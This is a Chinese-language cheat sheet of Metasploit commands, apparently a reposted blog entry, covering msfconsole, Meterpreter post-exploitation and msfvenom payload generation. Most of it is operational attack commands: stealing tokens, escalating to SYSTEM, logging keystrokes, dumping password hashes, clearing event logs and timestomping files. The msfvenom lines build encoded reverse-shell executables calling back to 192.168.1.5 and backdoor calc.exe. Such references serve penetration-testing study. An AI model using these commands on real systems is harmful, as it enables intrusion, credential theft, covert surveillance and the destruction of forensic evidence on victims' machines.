metasploit基础命令

metasploit

启动终端 msfconsole

help metasploit命令

tab 可以补全命令,文件之类的

search xxx

show exploitspayloadsauxiliary ame

info 展示出制定渗透攻击或模块的相关信息

use name 装载一个渗透攻击或者模块

LHOST 本地可以让目标主机连接的ip地址,通常目标主机不在同一个局域网内,就需要是公共ip地址

RHOST 远程主机或目标主机

set funtion 设置特定的配置参数

setg function 设置全局特定的配置参数,就是使用不同的模块不需要再设置一些配置了

show options 列出某个渗透攻击或模块中所有的配置参数

show targets 列出渗透攻击所支持的目标平台,哪些系统以及什么级别补丁才可能渗透成功

set payload payload

show advanced 列出所有高级配置选项 , 有些可以自动化攻击

set autorunscript migrate -f 在渗透攻击完成后,将自动迁移到另一进程

check 检测目标是否对选定渗透攻击存在相应安全漏洞

exploit -j 攻击将在后台进行

exploit -z 渗透攻击成功后不与会话进行交互

exploit -e encoder 制定使用的攻击载荷编码方式

sessions -l 列出可用的交互会话

sessions -l -v 详细信息

sessions -s script 在所有活跃的会话中运行一个特定的meterpreter脚本

sessions -K 杀死所有会话

sessions -c cmd 执行一个命令

db_creat name 创建一个数据库

db_connect name 创建并连接数据库

workspace 列出当前连接的数据库中所有的工作空间

workspace name 使用指定的工作空间

workspace -a name 创建一个工作空间

workspace -d name 删除指定的工作空间

workspcae -D 删除所有的工作空间

db-namp 利用namp 并把扫描数据存储到数据库中

Meterpreter

run scriptname

sysinfo 列出受控主机的系统信息

ps 显示所有运行进程以及关联的用户账号

migrate PID 迁移到一个指定的进程ID

use incognito 用来盗窃目标主机的令牌或是假冒客户

list_tokens -u 列出目标主机用户的可用令牌

list_tokens -g 列出目标主机用户组的可用令牌

steal_token PID 盗窃给定进程的可用令牌并进行令牌假冒

drop_token 停止假冒当前令牌

getsystem 通过各种攻击向量来提升到系统用户权限

shell 以所有可用令牌来运行一个交互的shell

execute -f cmd.exe -i 执行cmd.exe 命令 并进行交互

execute -f cmd.exe -i -t 以所有可用令牌来执行cmd命令

execute -f cmd.exe -i -H -t 以所有可用令牌来执行cmd命令并隐藏该进程

rev2self 回到控制目标主机的初始账户下

reg command 在目标主机注册表中进行交互。创建,删除,查询等操作

screenshot 对目标主机的屏幕进行截图

upload file 向目标主机上传文件

download file 从目标主机下载文件

keyscan_start 针对远程目标主机开启键盘记录功能

keyscan_dump 存储目标上捕获的键盘记录

keyscan_stop 停止针对目标主机上的键盘操作

getprivs 尽可能多的获取目标主机上的特权

uictl enable keyboard/mouse 接管目标主机的键盘和鼠标

background 将你当前的meterpreter shell 转为后台执行

hashdump 导出目标主机中的哈希口令值

use sniffer 加载嗅探模块

sniffer_interfaces 列出目标主机所有开放的网络接口

sniffer_dump/start/stats/stop interfaceID

clearev 清除目标主机上的日志记录

reboot 重启目标主机

timestomp 修改文件属性,例如修改文件的创建时间(反取证调查)

msfvenom

msfvenom -l payloads 列出所有可用的攻击载荷,encoders、nops、all 列出所有可用的编码器/空指令生成器/全部模块

msfvenom -p windows/meterpreter/bind_tcp --payload-options 列出配置项

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 -f exe -o payload.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 -e x86/shikata_ga_nai -i 5 -f exe -o en_payload.exe

//将该payload进行了5次shikata_ga_nai编码

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 -e x86/_countdown -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -i 5 -f exe -o multi_payload.exe

//创建一个经过多种编码格式嵌套编码的攻击载荷

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 -x clac.exe -k -o playload.exe -e x86/shikata_ga_nai -i 7 -f exe

// 使用calc.exe 作为载荷后门程序,让载荷执行流一直运行在被攻击的应用程序中

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 -x clac.exe -o playload.exe -e x86/shikata_ga_nai -i 7 -f exe

// 不让载荷执行流一直运行在被攻击的应用程序中,同时在攻击载荷执行后,也不会在目标主机上弹出任何信息

meterpreter 后渗透阶段命令

meterpreter > use priv
meterpreter > getsystem
meterpreter > ps

meterpreter > steal_token 1784
meterpreter > shell


原文地址:https://www.cnblogs.com/GH-D/p/8685591.html